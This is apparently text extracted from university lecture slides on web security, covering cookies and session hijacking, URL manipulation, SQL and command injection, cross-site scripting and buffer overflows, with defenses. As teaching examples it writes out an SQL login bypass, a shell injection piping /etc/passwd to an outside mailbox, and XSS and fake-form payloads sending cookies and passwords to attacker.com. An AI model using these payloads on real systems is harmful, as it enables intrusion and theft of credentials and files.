Network Security

Security Consideration for Web Security

 Outline
► Security Considerations for
 Web Security
► Browser Side Risks
► Server Side Risks
 Web Security
Browser Side Risks
 Web Security – Browser Side Risks
► Obtaining a valid browser
 IE usually comes with the OS
 Netscape can be obtained from web sites
 How can you be sure that you are downloading a genuine
copy? (remember DNS spoofing)
 A fake browser can look like a genuine one, but it can
► Obtain
and send passwords typed in by the user
► Downgrade browser security (e.g., reduce key length used in SSL)
 Web Forms

► Used to send data from the user to the server (e.g., online
applications, queries to a database, etc.)
► If pure HTTP is used, then the data is sent as clear text
► Sensitive information can be eavesdropped and/or
modified
 Helper Applications
► The browser cannot handle all kind of downloaded
data
► It invokes an external program (the helper) on
the user’s machine with the downloaded data as
parameter
► e.g., to display a PostScript file, it may pass it to
GhostView
► Downloaded content can be dangerous (e.g., MS
Word and Excel files may contain macro viruses)
 Mobile Code Java Applets
► Normally run within a controlled environment
(sandbox)
► Access to local resources is strictly controlled by
a security manager
► However, an applet may escape from the
sandbox due to some bugs in the
implementation of the Java Virtual Machine
► Several such bugs have been discovered,
reported, and fixed
► What guarantees that there’s no more?
 ActiveX Controls
► A Microsoft approach to mobile code
► ActiveX controls are executables that run directly on
the machine (there’s no sandbox)
► ActiveX controls can be signed and declared safe by
their creators
► But an ActiveX control declared safe may turn out to
be dangerous
 Compaq signed a control safe which allowed for remote
management of servers
 Microsoft signed a control which could write arbitrary file on
the hard disk (it was exploited by a virus Kak.Worm)
 JavaScript != Java Applet
► Scripts are interpreted by the browser itself
► Not as powerful as Java (e.g., many attacks require that
the user clicks on a button to activate the malicious code)
► Successful attacks reported include history tracking,
stealing files, helping Java applets to bypass firewalls, etc.
 Cookies
► A cookie is a (name, value) pair
► Cookies are set by web servers and stored by web
browsers
► A cookie set by a server is sent back to the server when
the browser visits the server again
► Used to create “HTTP sessions” (session state information
is stored in cookies)
 Cookies: Example
client server

get index.html

content of index.html + set-cookie: sessionID=123456789

get nextlink.html + cookie: sessionID=123456789

…
► If cookies are sent in clear, then they can be eavesdropped
and used to hijack an “HTTP session”
► Cookies can be used to track what sites the user visits (can
lead to serious privacy violation!)
 Many sites use third party advertisements
 The third party can set a cookie that identifies the user
 Cookies: Example
► This cookie is sent to the third party each time an ad is
downloaded by the user’s browser along with the address
of the page that contains the link to the ad (the “referrer”
field of the HTTP header contains this address)
whatever.com
index.html
<html>
…
browser
browser <img src=“http://thirdparty.com/ad_server.asp”>
…
</html>
get ad_server.asp +
referrer=“whatever.com/index.html” +
cookie: user=123456789
thirdparty.com
thirdparty.com
Case-study: home-banking application
-- Authentication process -- Web
Mario Rossi
Application

[1] https://www.mia-banca.it

[2] Sent authentication form over HTTPS

Case-study: home-banking application
-- Authentication process -- Web
Mario Rossi
Application

[1] https://www.mia-banca.it

[2] Sent authentication form over HTTPS

Credential verify: if ok 
[3] Insert username/password via HTTPS client authenticated
Username/password
 Cookie generation

[4] Personal Welcome page and Set Cookie

Cookie=TWFyaW8123
authentication
token
Case-study: home-banking application
Web
Mario Rossi --Following request-- Application

Cookie=TWFyaW8123 Cookie verifing:

Authentication [5] Request “movimenti”  Identify user

token Send data to user
Cookie=TWFyaW8123

[6] Response with user data

 Audit: cookies collection
Web
Mario Rossi --Authentication process-
Application

[3] Insert username/password via HTTPS Credential verify: if ok 

client authenticated
Cookie=TWFyaW8123  Cookie generation
Authentication [4] Welcome page and Set Cookie=TWFyaW8123
Token
 Audit: cookies collect (2)
1st Authentication:
User = Mario Rossi; password=12aB45cD:
Cookie=TWFyaW8123
2nd Authentication :
User = Mario Rossi; password=12aB45cD:
Cookie=TWFyaW8125
3rd Authentication :
User = Mario Rossi; password=12aB45cD:
Cookie=TWFyaW8127

Cookie Guessable: Cookie=TWFyaW8129

Session web hacking: identity theft
Web
Mario Rossi --Following request-- Application
Cookie verify:
[5] Request “movimenti” TWFyaW8179
Cookie=TWFyaW8179
Cookie=TWFyaW8179 Identify user Mario Verdi
Authentication Send Mario Verdi data
Token [6] Send Mario Verdi data
 Possible solutions

For a robust session management, it is necessary to protect:

 User credentials AND
 User authentication token (cookie, session ID)

Authentication token should be:

 Unique for each session
 Not predictable
 Resistant to reverse-engineering
 Cookies: Example
► http://www.musicvision.com/network_privacy_policy.html
Third Party Advertising
We use Maxworldwide and other third-party advertising companies to serve ads
when you visit our Web site. These companies may use information (not including
your name, address, email address or telephone number) about your visits to
this and other Web sites in order to provide advertisements on this site and
other sites about goods and services that may be of interest to you. If you would
like more information about this practice and to know your choices about not
having this information used by these companies, please click here

Third Party Cookies

In the course of serving advertisements to this site, our third-party advertiser
may place or recognize a unique "cookie" on your browser.
 Web Security
Server Side Risks
 Conventional Security
52678
Network Security
Controls
N-BIOS

HTTP(S)

FTP
Firewall Web Server Data Base
Server
RPC
URL Manipulation
URL Manipulation (contd)
 URL Manipulation (contd)
► GET request sends important parameters on the URL
► The parameters can be manipulated to give undesired results
► The GET requests are stored in the browser history
► Impact is HIGH
► Variants work on any user input on web page, hidden values or
information stored in cookies.

http://www.paladiontest.com/example?accountnumber=12345&debitamount=1
 URL Manipulation - Solution
► The best solution is to avoid sending critical
parameters in a query string

► Validate with session token

► Allsensitive data sent in the query string must be

cryptographically protected.
 Web Security – Server Side Risks
► Interactive web sites are based on forms and scripts
 Forms are written in html
 The user fills the form and clicks on a button to submit it
 This creates a request to the server that contains the data
typed in by the user
 The request launches a script on the server that processes
the data supplied by the user (may return a page that is
created using the supplied data)
 Unexpected User Input
► Unexpected user input may have unexpected
effects
 Special characters
 Too much data (may cause buffer overflow)
► At best, the server crashes
► At worst, the attacker gains control over the
server
Unexpected User Input: Example I
► An example: password based user authentication
 Assume the following server side script is used to check the supplied
username and password:
query$ = ‘SELECT name, pass FROM database WHERE name = “ ’ +
name$ + ‘ ” AND
pass = “ ’ + pass$ + ‘ ” ’
Result = SQLquery(query$)
if Result <> 0 then OK
 With name$ = username and pass$ = passwd
SELECT name, pass FROM database WHERE name = “username” AND
pass = “passwd”
 With name$ = username” OR TRUE OR name = “ and pass$ = passwd
SELECT name, pass FROM database WHERE name = “username” OR
TRUE OR name = “”
AND pass = “passwd”
Unexpected User Input
Target Site

Login Successful
http://target.site/login.jsp
`

Expected
The Unexpected
from user
Malicious User
 Unexpected User Input: Example II
► User can type his/her e-mail address in a form and the
server sends him/her the latest public company report
 Assume the following perl script is used on the server
system(“sendmail $address < report.doc”);
 With $address = [email protected]
system(“sendmail [email protected] < report.doc”);
 With $address = [email protected] <
/etc/passwd | sendmail [email protected]
system(“sendmail [email protected] < /etc/passwd | sendmail
[email protected] < report.doc”);
 Cross Site Scripting Example
Attacker.com Bank.com

Webpage + Cookies
Reflected Code
Malicious link on <SCRIPT>Send Cookie to
webpage or email with attacker.com</SCRIPT>
malicious link

Executed
Malicious Link http://bank.com/login/
http://bank.com/account.jsp? <SCRIPT>Send cookie to attacker.com `

User
Internet
Banking
Cookie
 Cross Site Scripting
► Attacker arranges that the victim receives a
malicious script from a trusted server
► Example:
 UserX places the script in the “guest book” of
UserB
 UserA visits the “guest book” of UserB
 His browser downloads and runs UserX’s script
 Cross Site Scripting: Example
► Requesting a non-existent file abcd.html from some web servers, they
return error messages like:
“The requested file abcd.html cannot be found on the server.”
 Attacker can place the following link on a page:
< a href=“http://trusted.server.com/is protected. The server needs you to
login.<br><form action=&#34;http://attacker.com/cgiscript.cgi&#34;
method=&#34;post&#34;>Username: <input type=&#34;text&#34;
name=&#34;name&#34;><br>Password: <input type=&#34;password&#34;
name=&#34;pass&#34;><br><input type=&#34;submit&#34;
value=&#34;Login&#34;></form><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>”>
 What Will Happen?
► Alice clicks on the link
► HTTP request is sent to trusted.server.com
► Server returns the usual error page, but it will look
like a login window...
The requested file is protected. The server needs you to log in.
Username:

Password:
browser window

Login
Login

cannot be found on the server.

 Cross-Site Scripting Defenses
►Remove from user input all characters that are
meaningful in scripting languages:
 =<>"'();
 You must do this filtering on the server side
 You cannot do this filtering using Javascript on the
client, because the attacker can get around such
filtering
Cross-Site Scripting Defenses (cont..)
► More generally, on the server-side, your application
must filter user input to remove:
 Quotes of all kinds (', ", and `)
 Semicolons (;), Asterisks (*), Percents (%), Underscores (_)
 Other shell/scripting metacharacters (=&\|*?~<>^()[]{}
$\n\r )
► Define characters that are ok (alpha and numeric),
and filter everything else out
 Buffer overflows
► Extremely common bug.
 First major exploit: 1988 Internet Worm. fingerd.

► 15 years later:  50% of all CERT advisories:

 1998: 9 out of 13
 2001: 14 out of 37
 2003: 13 out of 28

► Often leads to total compromise of host.

 What are buffer overflows?
► Suppose a web server contains a function:
void func(char *str) {
char buf[128];
strcpy(buf, str);
do-something(buf);
}
► When the function is invoked the stack looks like:
top
buf sfp ret-addr str of
stack

► What if *str is 136 bytes long? After strcpy:

top
*str ret str of
stack
Possible Results of Buffer Overruns
Possible Result Hacker’s Goal

To perform denial of service attacks

Access violation against servers

Instability To disrupt the normal operation of

software

To gain privileges for their own code

Code Injection To exploit vital business data
To perform destructive actions
Stack-Based Buffer Overrun Example
Top of Stack

void UnSafe (const char* uncheckedData)

char[4]

{ int
char localVariable[4];
Return
int anotherLocalVariable; address
strcpy (localVariable, uncheckedData);

}
 Heap Overruns
► Overwrite data stored on the heap
► Are harder to exploit than a buffer overrun
Data
Pointer
Data
strcpy xxxxxxx
Data

xxxxxxx
Pointer
Pointer
 Preventing overflow attacks
► Main problem:
 strcpy(), strcat(), sprintf() have no range checking.
 “Safe” versions strncpy(), strncat() are misleading
► strncpy() may leave buffer unterminated.
► strncpy(), strncat() encourage “off by 1” bugs.

► Defenses:
 Type safe languages (Java, ML). Legacy code?
 Mark stack as non-execute. Random stack location.
 Static source code analysis.
 Run time checking: StackGuard, Libsafe, SafeC, etc.
 Marking stack as non-execute
► Basic stack exploit can be prevented by marking
stack segment as non-executable.
► Problems:
 Some apps need executable stack (e.g. LISP
interpreters).
Run time checking: StackGuard
► Many many run-time checking techniques …
 Here, only discuss methods relevant to overflow protection.

► Solutions 1: StackGuard (WireX)

 Run time tests for stack integrity.
 Embed “canaries” in stack frames and verify their
integrity prior to function return.
Frame 2 Frame 1
top
local canary sfp ret str local canary sfp ret str of
stack
 Canary Types
► Random canary:
 Choose random string at program startup.
 Insert canary string into every stack frame.
 Verify canary before returning from function.
 To corrupt random canary, attacker must learn current random
string.
► Terminator canary:
Canary = 0, newline, linefeed, EOF
 String functions will not copy beyond terminator.
 Hence, attacker cannot use string functions to corrupt stack.
 StackGuard (Cont.)
► StackGuard implemented as a GCC patch.
 Program must be recompiled.
► Minimal performance effects: 8% for Apache.
► Newer version: PointGuard.
 Protects function pointers and setjmp buffers by
placing canaries next to them.
 More noticeable performance effects.
 Note: Canaries don’t offer fullproof protection.
 Some stack smashing attacks can leave canaries untouched.
 StackGuard variants - ProPolice
► ProPolice (IBM) - gcc 3.4.1.
 Rearrange stack layout to prevent ptr overflow.
args No arrays or pointers
String
ret addr
Growth
SFP

CANARY
Stack arrays
Growth
Local variables Ptrs, but no arrays
 Run time checking: Libsafe
► Solutions 2: Libsafe (Avaya Labs)
 Dynamically loaded library.
 Intercepts calls to strcpy (dest, src)
►Validates sufficient space in current stack frame:
|frame-pointer – dest| > strlen(src)
►If so, does strcpy.
Otherwise, terminates application.
top
sfp ret-addr dest src buf sfp ret-addr of
stack

libsafe main
Format string bugs
 Format string problem
int func(char *user) {
fprintf( stdout, user);
}

Problem: what if user = “%s%s%s%s%s%s%s” ??

 Most likely program will crash: DoS.
 If not, program will print memory contents. Privacy?
 Full exploit using user = “%n”

Correct form:
int func(char *user) {
fprintf( stdout, “%s”, user);
}
 Vulnerable functions
Any function using a format string.

Printing:
printf, fprintf, sprintf, …
vprintf, vfprintf, vsprintf, …

Logging:
syslog, err, warn
 Overflow using format string
char errmsg[512], outbuf[512];

sprintf (errmsg, “Illegal command: %400s”, user);

sprintf( outbuf, errmsg );

► What if user = “%500d <nops> <shellcode>”

 Bypass “%400s” limitation.
 Will ovreflow outbuf.
 Conclusion
► There are many more vulnerabilities and attacks Auto
© 2002 by Carnegie Mellon University Coordinated
http://www.cert.org/archive/ppt/cyberterror.ppt Cross site scripting
Tools
“stealth” / advanced
scanning techniques
High
packet spoofing denial of Staged
service distributed
sniffers
www attack tools
Intruder sweepers attacks
Knowledge automated probes/scans

back doors GUI

disabling audits network mgmt. diagnostics
hijacking
burglaries sessions
Attack exploiting known vulnerabilities
Sophistication
password cracking
self-replicating code
password guessing Intruders
Low
1980 1985 1990 1995 2000

► Some of these cannot be prevented by technical means, but only

with careful procedures and education of people
 Questions

???????????????
???????????????
????